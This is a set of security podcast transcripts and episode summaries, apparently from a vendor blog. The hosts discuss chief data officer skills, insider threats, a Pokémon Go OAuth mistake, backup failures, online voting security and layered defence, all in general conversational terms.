Bennett: It is. It's interesting because it's why we built the algorithms to capture so many different kinds of behaviors so that one person could not hide their trail well enough. But there's just basic things the companies should do to understand where their most valuable information is and where it's going. There is very simple technology out there that allows us to understand where valuable information is being routed and where it goes to that are far away from these kind of advanced algorithms.So it's common sense. In the Information Age a company's most valuable asset really is information. And so having what we call information governance principles, and so understanding and governing your information as you would any other asset is just good business.
Varonis: Right, absolutely agree.
So thank you so much, Bennett, on your insights today. Bennett, if people want to learn more about what you do and follow you on Twitter, do you have a handle or a website that you can share with everyone?
Bennett: Yes, thanks. My handle is @BennettBorden. And then most of my publications are on the firm's webpage at DrinkerBiddle.com under my profile. We write fairly often on this, and I would certainly welcome any thoughts from your listeners.
In this second podcast, Mr. Wendell continues where he left off last time.
He explains the skills you’ll need in order to be an effective Chief Data Officer and we learn more about MIT’s International Society of Chief Data Officers.
Richard: Yeah, there are really three category of skills.
The first category is what I'll call an IT skillset, traditionally. The second is more of a math skillset, and the third is really, like you mentioned, around communication, and even HR and change management. So I could talk to each of those briefly.
Information Technology
It's an interesting role, right, because typically, people who are strong in IT may not have as much background or expertise in math or HR, and you could say that about the other two as well. These are the three different areas of skills that often do not overlap, and to be a good CDO, you absolutely must have all three skills areas.
The IT skillset is all about new data technology. So I think the number one, if you go online and you look at search terms, the number one phrase that's most commonly associated with the chief data officer is data science.
Data science, if you look at, again, it mean a lot of things to a lot of people. But chief data officers, chief analytics officers manage the data science function.
Data science takes place in most companies now on top of newer data technology stacks. There are so many new technologies emerging every day that are absolutely critical for managing the function of data science, data integration.
And so being able to go in and work with IT department on building out that technology suite, and even occasionally standing up IT infrastructure with these new kinds of tools that, you know, maybe the IT department is typically focused more on very, very proven technologies that are enterprise scale that could be deployed and maximized their IT ROI, that is what they should be focused on. That's the perfect focus for IT.
But if that's all you do as a company, then you're never going to experiment with somebody's new technologies that are really required to do data science well, and this is where a CDO comes in.
So, you know, it's really important to be able to stand up and manage some of these new IT technologies, and you have to be a hacker to make it work. I mean, a lot of companies I know spend a year and a half just trying to figure out how to productionalize their hadoop cluster inside their firewalls. So you have to know how to hack through these things and hack around them. I find a lot of my peers in the CDO community grew up as hackers, and you really have to have that hacker mindset and enjoy problem solving.
Mathematics
Secondary of math, I mean, this is really all algorithms so you need to understand machine learning. You need to know what are the different flavors of machine learning and how is it applied. And you need to be able to, I think in order to be good, you need to be able to get down to a fairly detailed level with your data scientist to talk about different packages, and how they're applied in different parameters that they're using in their model. Machine learning is just one area that's really hot right now but I think of advanced analytics, some statistics all have many different models that are used to solve different types of problems.
And operations research, frankly, is an area that's often overlooked. There are many powerful quantitative techniques that come out of operations research, and increasingly now, computer science that are all really important and all have their place, and they're just different tools for different jobs. So we need to have that tool kits of algorithms to know which one or ones are best applicable to different business use cases.
If you want to do a cluster analysis with a huge dataset, maybe you want to do a simple k-means. If you have a smaller dataset and you think you can get more insight out of it, then maybe you can do a hierarchical. It's just one simple example, but you need to be able to match the business use case to the scale of data to the algorithm.
Change Management
And then the third area, I mentioned the HR skillset, is really around change management. This is where most companies I see really fall down because most companies focus on insight.
Insights are great. Insights don't make money.
And this is where I'm talking specifically about like 20th century companies that are looking to be 21st century companies. Companies like that, they are filled with a lot of really great talent that's just not used to being data driven in their workflows. And quite often, sometimes, there's resistance to data.
Maybe folks, at the end of the day, feel that their gut is going to give a better answer than a computer or an algorithm, and look, I'm not saying let's throw away gut feel. There are still many cases where we have to use gut feel, but I do believe that increasingly, over the next few decades, there are going to be a lot of knowledge workers that...their jobs are not going to be automated but they're going to be augmented.
They will be using data. They'll be using analytics to more directly inform the decision that used to be made more on gut feel, not replacing them but augmenting. And getting folks who are not used to trusting a dashboard to trust the dashboard is really hard. It's really hard. It's change management, and there are reams and volumes written on change management.
I've done a lot of this. I did a lot at American Express. You know, change management in business units, to become more data driven, there's a lot of best practices that go along with this.
And by the way, the skillset though is nothing to do with IT and nothing to do with the math, the first two skillsets I mentioned.
So, yeah, you're right. It's a very heterogeneous job that requires a very cross functional skillset to be successful.
Inside Out Security: It sounds like you need to start working when you're 15 years old.
Richard: You know, it's interesting. There's a lot to learn, I think, to be an effective chief data officer, for sure.
Richard: That's a really, really good way of putting it. You're absolutely right. It's curious across all three of those ends.
But it's something that I don't want to be discouraging.
I think that folks, more often than not, earlier on in their careers, specialize in maybe the first area, or the second area, maybe IT or math, and then expand over time to have all three of those critical areas checked.
But there are a lot of folks from data science increasingly are coming from liberal arts background. There's a whole new profession of data journalism. Data visualization is huge, and data science is coming in from that background. I would put that more on the HR communication skill bucket.
And I think if you're smart and you're really curious, as you said, there should be nothing stopping you from going out and acquiring all the skills that we're talking about.
What's a reasonable timeline you would give yourself as a CDO to validate and justify this new role?
Richard: It's a good question. I think that there are critical checkpoints along the way. I'll start at the beginning. I think that the first critical checkpoint is 90 days before you start.
And I'm not being facetious.
I actually believe that a good chief data officer is not going to take any CDO role that's not set up the right way.
And I've just found, with so many conversations I've had with companies that are looking to be successful in this area, they don't necessarily know how to structure the role for success. They don't know who...should the data warehouse and ETLT be under the CDO or not, or should that stay in IT.
And so I really think that it's incumbent on a CDO to make sure that that role is structured for success before they accept the job. Almost be a consultant to...and actually, a lot of CDOs who are in their roles were consultants or advisers to companies through this process.
I think that's number one, and then I think that, so coming in on day one with the right success structure and the right metrics is really important.
And then, you know, I think that it's interesting. A lot of people argue back and forth about should we be driving quick hits or no, actually, we should be driving transformation.
And it feels like there's people in one of these two camps, and the answer, I think, is actually both. You have to do both. I believe in taking a portfolio approach. I think that it's really important to very quickly, early on, identify a couple large transformational projects that are going to move the needle for the company, but are going to take more like, a year or two to do.
But in addition to that, there's got to be a whole hopper full of monthly click hits that come out, and they're just stoking the fire, feeding the engagements of the business. Because if you just do one or the other, then you're either going to lose engagement or you're going to lose the larger potential.
So I think, short answer to your question, the role needs to be set up for success. I think that within the first 90 days, a CDO needs to quickly assess the company, the situation, come up with an initial version of a road map, use a rigorous prioritization criteria to come up with a hopper of quick hits, data-driven quick hits, as well as a few big transformational projects that get the executive team and the board of directors excited.
Richard: Sure. So the MIT International Society for Chief Data Officers, it came out of several conversations that a few of us in the community were having with a couple professors in the Sloan school.
Really, think of us as the IEEE for chief data officers. So, not affiliated with a vendor and really having more of a code of silence around our meetings. Place for folks who...chief data officers, chief analytic officers, really, think of the leaders of the data and analytics for $200 million plus companies, is more or less the range that we're seeing.
To come together and roll up our sleeves and talk about what's worked, what hasn't worked, which vendors have delivered, which teams within which vendors have delivered, and what are common challenges.
It always amazes me.
…. From MIT, we went down to DC, and we were talking to chief data officers in the public sector. And I walked into those meetings thinking, "Oh, these people are going to have nothing in common with us in the private sector."
They were talking about the challenges of data integration, and the challenges of driving quick hits, and getting engagement. And in the end, it amazed me at how similar so many of our challenges are, and just how many really of the best ideas, or I call them jiu-jitsu moves kind of ways of overcoming these challenges as an executive, really come from outside of our industry.
So I think a lot of...it's important to obviously work with folks within one's industry to think about, specifics to regulatory issues, for example.
But I think that it's equally critical to look outside of one's industry to find best practices in areas that other industries may be a little further along on some issues, and maybe they figured out something that we don't.
So MIT ISCDO right now, I think we're on at around 150 executive members, would invite anyone interested, who thinks they qualify as an executive leader of data and analytics in companies have at least $100 million or so in revenue to apply. And we do screen all the potential members. And if assuming that somebody is qualified to be a member of our community, we would absolutely love to have them join us.
Inside Out Security: Thank you so much, Richard. I'm wondering, if people want to follow you, how can people contact you or follow you on twitter?
Richard: Yeah, sure. So I would say, first, iscdo.org. My twitter handle is @reWendell, and my email address if anyone wants to get a hold of me is richard@Wendell.io.
Inside Out Security: Thank you so much, Richard.
Richard: Thank you, Cindy. I enjoyed talking with you. I look forward to staying in touch.
Last week, Alpesh Shah of Presidio joined us to discuss law firms and technology. With big data, ediscovery, the cloud and more, it’s of growing importance that law firms leverage technology so that they can better serve their clients. And in doing so, law firms can spend more time doing “lawyerly things” and, um, more billing.
Hallmarks of this episode include:
and
Want to learn more about Presidio? Visit them online. Or better yet, email Alpesh Shah ashah@presidio.com
.
Join us Thursdays at 1:30ET for the Live show on Youtube, or use one of the links below to add us to your favorite podcasting app.
The post Bring Your Geek To Court – IOSS 22 appeared first on Varonis Blog.
We were thrilled when Pen Testing veteran, Ken Munro joined our show to discuss the vulnerabilities of things.
In this episode, Ken reveals the potential security risks in a multitude of IoT devices – cars, thermostats, kettle and more. We also covered GDPR, Privacy by Design and asked if Ken thinks “The Year of Vulnerabilities” will be hitting headlines any time soon.
Munro runs Pen Testing Partners, a firm that focuses on penetration testing on the Internet of Things. He’s a regular on BBC, and most recently, he was interviewed by one of our bloggers, Andy Green.
Join us Thursdays at 1:30ET for the Live show on Youtube, or use one of the links below to add us to your favorite podcasting app.
The post The Vulnerability of Things – IOSS 21 appeared first on Varonis Blog.
Whether you’re a proponent of open-source or proprietary software, there’s no doubt that the promise of open-source is exciting for many.
For one thing, it’s mostly free. It’s built and maintained by passionate developers who can easily “look under the hood”. The best part is that you’re not married to the vendor.
Yes, there are many helpful open-source security tools as well as awesome projects based on Go. But lately, there has been a controversial case of open-source ransomware. Originally created to educate others about ransomware, it’s turned into a mashup ransomware without a way to backdoor the decryption key.
In this episode, we discuss the benefits and shortcomings of open-source, a throwback to our passwords episode and more!
Join us Thursdays at 1:30ET for the Live show on Youtube, or use one of the links below to add us to your favorite podcasting app.
The post Go Open Source! – IOSS 20 appeared first on Varonis Blog.
After reading about an IT admin at large bank who went rogue, we put on our empathy hats to understand why.
And in this episode, we came up with three reasons:
Could changing the way you dress and improving your communication style be the answer?
What do you think? Let us know!
Join us Thursdays at 1:30ET for the Live show on Youtube, or use one of the links below to add us to your favorite podcasting app.
The post Moods and Motives of a Smooth Criminal – IOSS 19 appeared first on Varonis Blog.
Hackers, Executives, Military Folks, IT People who work in Insurance, even Cab Drivers all had something to teach us about security and privacy at the latest Black Hat event in Vegas.
Join us Thursdays at 1:30ET for the Live show on Youtube, or use one of the links below to add us to your favorite podcasting app.
The post Excellent Adventures at Black Hat – IOSS 18 appeared first on Varonis Blog.
Going from policy to implementation is no easy feat because some have said that Privacy by Design is an elusive concept.
In this episode, we meditated on possible solutions such as incentivizing and making privacy as the default setting. We even talked about the extra expense of having a Privacy by Design mindset.
What do you think about going from policy to implementation? Share with us your thoughts!
Join us Thursdays at 1:30ET for the Live show on Youtube, or use one of the links below to add us to your favorite podcasting app.
The post More Articles on Privacy by Design than Implementation – IOSS 17 appeared first on Varonis Blog.
If there’s something strange on your network, who should we call?
The security team!
Well, I like to think of them as Threatbusters. Why? They’re insatiable learners and they work extremely hard to keep security threats at bay.
In this episode, we talk about awesome new technologies(like computer chips that self-destruct and ghost towns that act like honeypots), how to get others within your organization to take security threats seriously, and awesome threatbusters that are doing applause-worthy work.
Join us Thursdays at 1:30ET for the Live show on Youtube, or use one of the links below to add us to your favorite podcasting app.
The post Threatbusters – IOSS 16 appeared first on Varonis Blog.
When technology doesn’t work when it should, is it a tech fail? Or perhaps because humans are creating the technology, fails should be more accurately called a human fail? In this episode, we discuss various types of “fails”, including the latest popular Pokémon Go, why we can’t vote online and the biggest fail of all, a data breach.
Cindy: This week, I’m calling our show #techfails.
But in preparing for this show and thinking deeply about our fails, I just want to echo what Kilian has been voicing these past couple of episodes, that when our technology fails; like for an instance, if my Skype for business isn’t working, then my first thought is, “Oh, it’s a tech fail. I can’t believe it’s not working.” But we’re the one creating the technology.
So, for me, it feels, at the end of the day, a human fail. Let’s discuss this and debate it for a bit.
To set the context, there was an article in the Harvard Business Review, and eventually turned into a LinkedIn post too. It’s titled “ A New Way for Entrepreneurs to Think About IT.” It said that IT’s primarily known as a necessary evil, IT support or IT as a product. With many different types of technologies at our fingertips, we can really do a blend of both.
For instance, APIs have really changed how firms interact and share information with each other. And we really take this for granted these days, because back then you’d have to get permission from legal to sign contracts before experimenting with partnerships.
Now you can easily partner up with another service within API or use OAuth . It’s really increased our productivity, but it can also have some potential problems if we’re not careful.
For instance, if you downloaded Pokémon Go earlier this week, you might have been given Google full access. That meant that the Pokémon people could read all your emails and send out emails for you.
But since then they fixed it. I think, Kilian, they fixed it pretty quick.
Kilian: Yeah, in about, I think, 24 hours, more or less, they had a patch out that it addressed it already. I think, as opposed to a technology fail, that might be a technology win, for a company really taking these concerns seriously and addressing it as soon as it’s kind of brought up.
Mike: Before we get into that, I just want to know, what’s your guys’ level? How you been doing on Pokémon Go? Have you been getting out there, doing your Pokémon?
Cindy: I’ve been…I actually downloaded it at the office. And I could have thrown something at somebody, but I didn’t. I’m like, “Well, I’m just doing this for work, so better not start running after people and throwing stuff at them.”
Mike: You couldn’t convince the rest of the office that playing Pokémon Go was part of your job?
Cindy: Actually, we had a mobile photography class earlier this week, and Michelle, our HR person, was walking around telling people that Pokémon’s gonna be there. She was doing that for me.
Mike: Nice. How about you, Kilian, have you tried it?
Kilian: No, I haven’t downloaded it. That would require going outside and interacting with things, maybe.
Mike: The first couple ones show up right around you. And I think this is kind of where I was going with this, which is that a lot of this…in terms of tech fails, this is really about managing complexity.
In terms of IT, trying to manage these external services, it’s about managing complexity on an organizational level instead of a personal one. Because when you think about what is involved for this stupid game of Pokémon Go, you’re talking about interacting with geosynchronous orbital satellites for GPS, the internet to get all these apps, these multiple different services. And to pull all that together requires this huge thing. The security issue came about because Google was asking for OAuth access, and that’s just when you use Google to log into it. You log in with your account and it has these things.
And it’s so complex because even though it doesn’t look like it, it actually uses Google Maps data underneath.
A trick you can do, is if you have Google Maps installed on your iPhone, you can enable offline map access. And in order to achieve the app to app communication on your sandbox apps on the iPhone, it needs all these extra permissions, and it’s just insane trying to make that work. It’s so easy when you’re building something to just like, just give me all the permissions, and we’ll slowly back it down until where it’s supposed to be.
Cindy: Do you think this is kind of like, “okay, we’re gonna use external service, and then just not really look at the settings because we’re so focused on making Pokémon Go just a wonderful experience?”
Mike: Well, that’s the consumer side. The level we work at, people try to look at something like Amazon web services, which this article mentions. It is fantastically complex.
It’s something like 60 different individual services that do individual things and also overlap with other ones where like, oh, there’s like six different ways to send an email with AWS. There’s 20 different ways to put a message in a queue to be picked up by something else. Just trying to wrap your head around like, what actually is it doing, is just insane.
And it’s possible to do the stuff. I think it’s just a really hard equation of, “Do we bring this in-house and have a dedicated person for it? Is that more or less of a threat than having this outside?”
Something I see a lot of is…coming more from the app side of things is, people swearing up and down that, “I’m gonna get on a virtual private server somewhere for ten bucks a month, put my own version of Ubuntu on it and keep it up to date.”
And it’s really hard to imagine that that is as secure as having a dedicated security team at AWS or Heroku or one of the other Azure platforms as a service.
It’s that same scenario, sort of, at the organizational level, that either it’s a tremendous amount of effort to maintain and secure all those things yourself, or you’re essentially paying for that in your service contract.
Cindy: I think those are all really good questions to ask, and it requires a huge team.
Cindy: I kind of want to transition into another fail that’s different than asking good questions and figuring out the architecture.
The next fail is a fail on many different levels. It would be interesting for us to discuss.
Back in April, there was an article published and shared over 65,000 times when a small hosting company with a little over 1,500 users said that he deleted their customer’s hosted data with a single command.
Then later we found out that he was just trying to market his new Linux service for his company. And then people were outraged, “He didn’t do a better job backing up,” they were outraged that he lied to server fault, like a community that really helps one another figure stuff out. It’s security, and backing up, and just technology, it’s complicated.
I was a little skeptical reading the article with the headline that said “One Person Accidentally Deletes His Entire Company With One Line of Bad Code.”
As you’re responsible for hosting data, you should have multiple backups.
One of my favorite comments is, how do you even accidentally type that you accidentally deleted stuff?
What are your thoughts and reactions to this article?
Mike: Kilian, you want to go? I have my own thoughts.
Kilian: Sure.
First off, that’s a terrible job of advertising. I don’t know what he’s advertising for. Like, “Host with us and I might break your stuff.”
I think the point he was probably going for is that it’s easy to make mistakes, so get a dedicated person that knows better.
But I don’t think that really came across.
For the actual command itself, a lot of people are in such a hurry to automate and make things easier that it is easy to make mistakes, especially as Mike mentioned earlier, with these vastly complicated systems with dozens of ways to do the same thing.
The more the complex the system gets, the easier it is to make a mistake. Maybe it could be that disastrous.
But a lot of things really have to go wrong, and kind of poor decisions made throughout the chain. But it’s conceivable that someone could have done that.
Mike: Specifically, to the question that’s asked on server fault, which is like a question and answer side for these issues. There’s a lot of utilities that can either take a single or multiple different directories as arguments.
So you say, “Hey, copy these two things,” or “Copy this one thing.” And so, in this, the person, they put a space so they have like: /pathfolder /. And so, that last slash got interpreted as the root of the volume they were on. And so, hey, we just destroyed everything, and everything includes all your keys and stuff.
Something we talk a lot about in here is layered security, but you need layered backups and recovery as well.
That was really the answer to this, is that they were on a virtual private server.
In addition to just backing up the local data, their database, the files on it, it takes system images of your entire VPS and keeps it somewhere else.
I am incredibly paranoid with backups, especially backups of systems like this. So I always try to even just get it out of the system that…if it’s on…in this case, it was Hetzner, which is a European hosting system, that you get that out onto S3 or you get it out on to Rackspace cloud or something else, just to try to make that a better scenario.
Kilian: That’s a great point, is having multiple different…you can’t have one single point of failure in a system like this.
Otherwise, you could be very vulnerable.
Even for myself when I, for example, backup pictures off of my camera, I have to go to my laptop, I have to go to a network share, and then I have a separate hard drive that I plug in just for that, and then unplug and put it away afterwards. So I have three different places for it. Not that they’re that valuable like a hosting system, but silly things happen sometimes. You know, if I lose power or power surge, I lose two of my systems for some reason, I still have that hard drive that’s sitting in a drawer.
Mike: I have a lot of discussions with people where they have backups and this very elaborate system. They’re like, “All right, I have my local network attach storage here, then I got this ‘nother server, and then I rotate them and do all this stuff.” That’s awesome until their house catches on fire and they lose everything. And that’s the stuff you have to think about. It’s like these things come in in weird ways, especially everything is so interconnected and everything is so dependent upon each other that you can just have these weird cascading levels of failure. And from very crazy sources of stuff. Like, DNS goes like a DNS server gets a DDoS attack. And then that actually ends up taking down like a third of the internet just because everything is so connected.
Cindy: Our next fail…I want to know if you guys think that our inability to vote online is a human fail or a tech fail. What do you guys think? Or any opinion, really.
Mike: It’s all in the execution, like all this stuff. That if there was a verifiable, cryptographically secure way of knowing that you could vote, that would be a very positive thing, potentially. It’s a really interesting mix of software and technological concerns, and people, and sociological and political concerns.
What I just said about having almost a voting receipt that says, “Great, you used your key to sign, and you have definitely voted for this person and done this thing.”
One of the reasons that’s never been done, even on most paper stuff, is that that was a huge source of fraud that in like the olden days, when they had voting receipts, you would go and turn them into your councilman and they would be like, “Great, here’s your five bucks for voting for me in this election.”
So that’s just something that’s not done. That’s not a technical issue. It’s certainly possible to do those things, but it leads to all these other unforeseen, I don’t know if you’ve heard of the cobra effect kind of things, these horrible unintended consequences.
Cindy: I think this article on why we still can’t vote online was just very thoughtfully written. It talked about how it can potentially destabilize a country’s government and leadership if they don’t get voting online right. It was really just like, wow, I can’t believe a researcher at The Lawrence Livermore National Lab said, “We do not know how to build an internet voting system that has all the security, and privacy, and transparency and verifiable properties that a national security application like voting has to have.” And they’re worried about malware, they’re worried about ransomware, they’re worried about being able to go in and track, do a complete security audit.
They said something interesting too about how, in the finance system, sure, you have sensitive data, and you can go back and track where the money went more or less, if you have these systems in place. But you might not necessarily be able to do that with voting, and someone can say, “I voted for so and so,” and then change it to somebody else, and they can’t go back and verify that. There are so many elements that you need to consider. It’s not just Pokémon, or you’re not trying to create a wonderful gaming experience, or you’re not trying to back things up. They’re a multitude of things you need to take in to consider.
Kilian: The one big thing, and I think the heart of it, was the need for anonymity in the voting process.
That’s kind of the way it was set up to avoid coercion and some other problems with it, is you need to be anonymous when you cast that vote. By putting it online, the real down side is… Like, if you think about online banking, it’s important to know and verify that you are who you say you are, and have a transaction of that entire process so you can ensure…it’s kind of both parties know that the money transfer from X to Y or so on and so forth. And you have the track of the steps.
But when you try and introduce anonymity into that equation, it completely falls apart. Because if you have that tracking data going back to somebody casting a vote, then they could be a target of coercion or something like that. Or if the opposition party finds out, they could go after them for not voting for whoever.
Cindy: Yeah, they did that with Nelson Mandela.
Kilian: Yep.
And then the other thing too is, as a person casting a vote, if you think about it, you’re kind of trusting the system. It’s completely blackboxed you at that point. So when you click the button and say, “I vote for candidate XYZ,” you have no idea, because, again, you want to be anonymous. You don’t have that verification of the system that says, “Hey, my vote wasn’t changed to candidate ABC in the process.” You kind of have to go along with it.
Even if you look back at some of the physical problems with the George W. Bush election with the ballots not lining up right with the little punches. It was punching for… I forget what the other candidate’s name was.
Cindy: Al Gore?
Kilian: No, no, no. It was like Paton Cannon or somebody. Whoever the third party candidate was. But they were saying, “No, no, I voted for Al Gore…” whoever, but it registered somebody else. They had to go back and manually look at that, and look at the physical paper to see that to validate that. But if you think in a digital system, if you click the button, you have no way to audit that really. Because if the system says, “No, you’ve voted for this guy,” you have no proof, you have no additional evidence to back that up, and that’s the big problem.
Cindy: They actually showed this in “The Good Wife,” the TV show that is no longer around, or they just ended. The voters would go in and they would vote for someone, but then it would also give the other person five additional more votes. I think another thing to…they didn’t mention it, but I think politicians or just that kind of industry are kind of a tad bit slower in the technology side.
Because Barack Obama’s campaign really set the tone for using technology and using social media to kind of engage the voters. It’s kind of like he really changed how now politicians are marketing and connecting with people. I don’t know, do you feel like they’re kind of behind? Or maybe that’s just me?
Kilian: My personal opinion is, we have laws that don’t make sense with where technology’s at, because they are slow. We’re still running on laws, and been prosecuting cases with laws that were made in the ’80s and early ’90s, and even older in some cases, where technology was vastly different than what we have today. This might be off topic, but there was just, I think, a ruling that the Computer Fraud and Abuse Act could theoretically mean that if you share your Netflix password, it’s a federal crime. Now, that’s open to interpretation, but that was a story I had seen the other day. We have all this technology and it’s evolving much, much faster than the people making the regulations can kind of keep up with it.
Mike: I just want to see a Poke stop at every voting registration.
Cindy: Mike has Pokémon on his mind.
Kilian: It’s great, it’s good fun.
Cindy: Now I have Pokémon…I actually visualized us playing Pokémon at a voting station. That would be interesting. It’s too hot and humid in New York to do that.
Kilian: Vote to vote or play Pokémon.
Cindy: I almost want to say Poke because it’s so hot.
Kilian: Well, to the candidates out there, the first one to get on top of this making a Poke stop at the voting booths in November might seize the election with the youth vote.
Mike: A Pokémon at every pot.
Cindy: Let’s also kind of think about potential fails, though. We’ve seen Target, Sony, the data breaches. And so, when fails happen that costs them their jobs, do you think one person should be blamed for all of it or can we also kind of say, “We don’t have the technology right yet”?
Mike: It’s interesting. What we’re talking about is, there have been a lot of very large data breaches. And what seems to happen is, it happens and then depending upon how much press it gets, the CEO has to resign or doesn’t. Or in the case of the OPM, the director. The parallel that I like to think of is Sarbanes Oxley, which has had a lot of other consequences. But the big one was that the chief executive has to sign off on the financials of the company. Before, it was always there were a lot of scandals where it was like, “I’m just running the company. My CFO and the accounting group, they were doing their own thing with the funds. And I wasn’t aware that this…”
Then we said this like 10,000 pounds of coconuts we had on the dock, they were rotten were actually good. We counted those in the asset, all of those kind of shenanigans. And just that thought that, okay, the finances and the statements that are put out, that is an executive level sign off, that there’s a responsibility at that level to ensure that those are correct. What we’re seeing is sort of that happening on the IT security side. That maintaining integrity of your customer’s data, of the people you’re responsible for, that is something that the executives need to say is a priority, and to ensure that in any way they can. That if they aren’t doing that, that’s their job, that they failed at their job.
Now, looking through these kind of stories, you typically find that the person in charge is not a network security person, because there’s not a lot of people that get their CISSP and then say, “I’m qualified to be CEO.” That’s just not how the normal job progression works. But they need to have people in place, and they need to make sure that the right things are happening, despite not having the personal expertise to implement those but that they make it a priority and they give budget, and they’re able to balance it against the other needs of the company.
Cindy: In order to come back from a security or technology fail…there was an article about “There’s new technology that can predict your next security fail.” They are essentially talking about predictive analytics. I really like a quote that they wrote that, “It’s only as good as the forethought you put into it, and the questions that you ask of it.”
If you don’t think about it, if you don’t have a whole team to work on this huge security and technology problem…because there’s only so much you can…in terms of big data, machine learning, predictive analytics, there’s a lot of stuff, a lot of elements that you’re unable to kind of account for.
So if you don’t consider all the different elements in security, you can’t build that into the technology that we build. What are some other things you think that can help companies prevent or come back from a tech fail or a security fail or a human fail?
Kilian: The only thing I could get in my mind there was asking the right questions. For me is from Hitchhiker’s Guide to the Galaxy. If you ask it, what’s the meaning of life, the universe and everything, it’s gonna give an answer. But what’s the question you’re really trying to get out of it? That’s all I can think of in my head. I think that’s one thing people get stuck in a lot of times, is asking the wrong questions that they need from their data. I’m sorry, Mike, I cut you off there. You were gonna say something.
Mike: I’m in agreement with you, Kilian, because I think too often the question posed is, “Are we secure?” There’s no crisp answer to that. It’s never gonna be yes, we’re 100% good, because the only way to do that is not to have any data, and not to have any interactions with customers. If that’s the case, then you don’t have a business. So you have to have something. You still have to have people interacting, and the moment you have two people interacting, you’re vulnerable at some level. They can be tricked, they could do anything. And then you have networks, and the networks are talking.
So it’s much more about, what is the level of risk that you find acceptable? What steps can you take towards mitigating known dangers? How much effort and time and money can you put behind those efforts? There’s no quick fix. Something we talk about a lot on this is that data is, in a lot of ways, like a toxic asset. It’s something that you need to think about like, “Oh, we have all this extra data. Well, let’s try and get rid of some of it. Just so we don’t have it around to cause us a problem, just so we don’t have it around to be leaked in some way.” There’s lots of different ways to do that and lots of benefits of doing so.
Cindy: Now in the parting gift segment of our show, where we share things we’re working on, or something we found online that we think our viewers and listeners would appreciate. I just read that Chrysler, the car brand, is offering a bug bounty between $150 to $1,500 for finding bugs. But you can’t make it public. And also, I just updated top InfoSec people to follow. I included a whole bunch of other women that were missed. So check that out at blog.varonis.com.
Mike: Who’s the one person you think we should follow that we weren’t before?
Cindy: I definitely think we should be all following Runa Sandvik. She’s the new InfoSec security person. She writes about the Info security at the New York Times. She also worked on Tor, and she did this really cool rifle hack. And she wrote about that. Or someone wrote about her hack on Wired. Any parting gifts, Mike?
Mike: I was gonna recommend Qualys’ SSL lab server test. If you’re unaware of what it is, you can put it in your website and it will run through all the different ways in which you’ve screwed up setting it up properly to be secure. It gives you a nice letter grade. So, a couple interesting things about this. One: It’s really hard to make one of these yourself, because to do so, you have to maintain a system that has all of the old, bad libraries on it for connecting on SSL1 and 2 and 3 that are deprecated. Just so you can make the connections and say, like, “Yes, this remote system also connects with this.” So it’s not something you want to do, and it’s not something you can do trivially. So it’s great that this is an online service.
And then two: I think it’s really interesting how…they essentially just made up these letter grades for what they consider as an A, A+, B. But in doing so, they were able to really improve the security of everyone. Because it’s one thing to say, “Okay, out of 200 possible things we comply with, 197 of them.” It’s a different thing to know, “Okay, we got a failing grade because one of those three things we didn’t do was actually really, really bad and exploitable.” And to be able to compare that across sites, I think, just has a lot of incentives to make everyone improve their site. Like, “Oh, gosh, this other site is a better grade than us. We should definitely improve things.” So for those reasons, I think it’s a really great part of the security ecosystem and a great tool for all of that.
Cindy: Kilian, do you have a parting gift?
Kilian: I was reading an article the other day, it was pretty interesting how we all come to rely on our phones and our digital assistance, like Siri or Google Now, to make our lives easier to interact with a device. Some researchers started thinking that, “Hey, this is a good avenue for exploitation.” They started kind of distorting voice commands so they can embed it in other things, to get your phone to do stuff on your behalf. So, it’s just an interesting thing to keep aware of and how you’re using your digital assistance, because other people could start to exploit it by issuing voice commands to it to maybe direct you to a malicious site or something. It’s one more thing to kind of keep in the back of your mind.
Join us Thursdays at 1:30ET for the Live show on Youtube, or use one of the links below to add us to your favorite podcasting app.
The post TechFails – IOSS 15 appeared first on Varonis Blog.
Layered security refers to the practice of combining various security defenses to protect the entire system against threats. The idea is that if one layer fails, there are other functioning security components that are still in place to thwart threats.
In this episode of the Inside Out Security Show, we discuss the various security layers.
Cindy: Hi and welcome to another edition of The Inside Out Security Show. I’m Cindy Ng, a writer for Varonis’ Inside Out Security Blog, and as always, I’m joined by security experts, Mike Buckbee and Kilian Englert. Hi, Kilian.
Kilian. Hi, Cindy.
Cindy: Hey, Mike.
Mike: Hey, Cindy. You call us security experts. I’m actually, where I don’t know if you can see it, “I have a fake internet job”…because I still haven’t been able to explain my job to my mom and dad. “He does something.”
Cindy: We’ll see who’s most fake at the end, okay?
So recently, Rob wrote a layered security guide and I thought it would be interesting for us to go through each of the layers and share stories that we’ve read or heard as it relates to each of the layers.
The idea with layered security is that you want to make sure that you have many different layers of defense that will protect you. If there are any holes, just in case something gets in, you might have a security layer that serves as a backup that will catch it.
So the first layer to start is the human layer. So that layer is all about educating people to spot scams and be cautious about the passwords that they give out, their social security numbers that they give out, their credit card information.
This layer, Kilian, you talk about this a lot. I feel like, increasingly, criminals are using and exploiting services that we rely on and turning it into like an attack vector, like there is an article recently about people texting you pretending to be Google and saying, “Hey, there was this suspicious attempt to get it in.” And we talked about passwords and alternatives and using two factor and it’s kind of like, “Oh man, I have to check my text messages and make sure I’m not scammed again,” like another thing to worry about.
Kilian: Oh, yeah. People, by nature, want to be trusting of other people. We kind of have been trained since day one to feel kind of bad about being suspicious … The bad guys out there know this and they exploit it. It’s so much easier to go after a person and just kind of play off of emotions because they’re far more malleable than a system, and people often are not trained or educated around security practices. And even if they are, they’re kind of trained into a certain mindset.
So if they see something that looks semi-legitimate like, “Hey, a text from Google. Oh, they’re protecting me. They have my login name or my IP address or something, NIC address,” because most people are not going to investigate that closely, it’s going to look fairly legitimate like, “Oh, hey, Google’s looking out for me. This is great.” It’s very easy to, just with a little bit of a legitimacy, to get people to kind of go along with it and it’s…the con of that sort is as old as time basically and it’s only getting easier any more, too.
Mike: I’ll go with something that you said Kilian, which is that it’s really about our mindset. And I think from a security practitioners’ standpoint, we’re typically very focused on exploited time and this and do this things and so we forget a lot about on the human layer which is education and like how to educate your users and to help make them part of your line of defense.
I think a fun activity for that is actually to do phishing, and there is a couple of companies that do this, that do like fake phishing attacks, and then basically, so I go, “You clicked on this so we are reporting you to IT.” And it’s kind of almost like in hospitals where they like shame the doctors into making sure they wash their hands all the time. You’re kind of like trying to enforce this IT hygiene aspects on all of your users, and either hire a company or you have some free time, you can just try to phish your users individually to mess with them.
Kilian: Sure.
Cindy: Our next layer is the physical layer , and you know, I would be like the worst security person to hire because I wanted to skip talking about this layer. There are so many layers and Mike’s like, “Why aren’t we talking about it? It’s the most important one.” And Kilian is like, “It’s often overlooked.” And I said, “It’s just the physical layer, like everybody gets that.” Tell us a little bit more about the physical layer.
